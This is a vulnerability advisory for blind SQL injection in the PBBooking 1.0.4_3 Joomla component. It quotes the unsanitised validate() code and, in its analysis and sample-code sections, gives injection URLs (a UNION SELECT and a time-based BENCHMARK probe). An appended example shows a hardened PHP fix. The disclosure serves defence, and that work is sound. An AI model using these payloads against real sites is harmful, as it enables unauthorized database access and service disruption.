PBBooking 1.0.4_3 Joomla Component Multiple Blind SQL Injection

Name               PBBooking
Vendor             http://sourceforge.net/projects/pbbooking/
Versions Affected  1.0.4_3
Author             Salvatore Fresta aka Drosophila
Website            http://www.salvatorefresta.net
Contact            salvatorefresta [at] gmail [dot] com
Date               2010-07-29

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION
________________________

A simple, easy to use, calendaring and booking component for Joomla. PBBooking offers live calendar integration both for reading availability and for writing appointments back to your calendar.

II. DESCRIPTION
_______________

Some parameters are not properly sanitised before being used in SQL queries.

III. ANALYSIS
_____________

Summary:

 A) Multiple Blind SQL Injection

A) Multiple Blind SQL Injection
_______________________________

The parameters timeslot and id passed to controller.php, when the task option is set respectively to save and validate, are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Affected code for id parameter:

    function validate() {
        $pendingid = JRequest::getVar('id');
        $email = JRequest::getVar('email');
        $sql = "select * from #__pbbooking_pending where id = ".$pendingid;

Maybe the injection caused by the id parameter may be carried to a normal SQL injection, but because of some errors in calendar.php, currently it is not possible. Are those errors present only on my webserver? If no, try the following injection:

index.php?option=com_pbbooking&task=validate&email=ola@ola.com&id=-1 UNION SELECT 1,'ola@ola.com',3,4,5,6,7,8,9

IV. SAMPLE CODE
_______________

A) Multiple Blind SQL Injection

http://site/path/index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))

V. FIX
______

No fix.
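The root cause in section III is that the raw `id` request value is concatenated into the SQL string. The following is an added example, not the advisory's text and not code from the PBBooking project or a vendor patch: it places the lookup as quoted in the advisory beside a hardened version that coerces `id` to an integer at the request boundary (Joomla 1.5's `JRequest::getInt`) and lets the database driver quote any string it does use. The function names `pbbookingLookupPendingVulnerable` and `pbbookingLookupPending` are hypothetical; only the table name `#__pbbooking_pending` and the `id`/`email` parameters come from the advisory.

```php
<?php
// Added example for illustration; not part of the advisory or of PBBooking.
// Assumes a Joomla 1.5 environment where JRequest and JFactory are loaded.

// The pattern quoted in the advisory: an untyped request value is concatenated
// straight into the query, so "id=-1 OR (...)" becomes part of the SQL.
function pbbookingLookupPendingVulnerable()
{
    $db        = JFactory::getDBO();
    $pendingid = JRequest::getVar('id');          // arbitrary string
    $sql = "select * from #__pbbooking_pending where id = " . $pendingid;
    $db->setQuery($sql);
    return $db->loadObject();
}

// Hardened version (hypothetical name). The id column is numeric, so the value
// is forced to an integer before it can reach the query; non-numeric input
// becomes 0 and is rejected. The e-mail is typed as a string and, should it
// ever be compared in SQL, passed through the driver's Quote() rather than
// concatenated raw.
function pbbookingLookupPending()
{
    $db        = JFactory::getDBO();
    $pendingid = JRequest::getInt('id', 0);        // "abc", "-1 OR ..." -> 0 / -1
    $email     = JRequest::getVar('email', '', 'request', 'string');

    if ($pendingid <= 0) {
        return null;                               // nothing valid to look up
    }

    $sql = 'SELECT * FROM #__pbbooking_pending'
         . ' WHERE id = ' . (int) $pendingid;      // cast again at the sink
    $db->setQuery($sql);
    $row = $db->loadObject();

    // Example of using the string value safely in PHP instead of in SQL:
    // compare the submitted address with the stored one (assumed column name).
    if ($row && isset($row->email) && $row->email !== $email) {
        return null;
    }
    return $row;
}

// If the address must be part of the WHERE clause, quote it via the driver:
//   ' AND email = ' . $db->Quote($email)
```

The two properties worth checking in a review of any fix are visible here: every value that reaches the SQL string is either an integer produced by a cast, or a string produced by the driver's quoting routine, and the integer is validated (positive) before the query is issued, so the time-based `BENCHMARK` probe from section IV has no unquoted position left to land in.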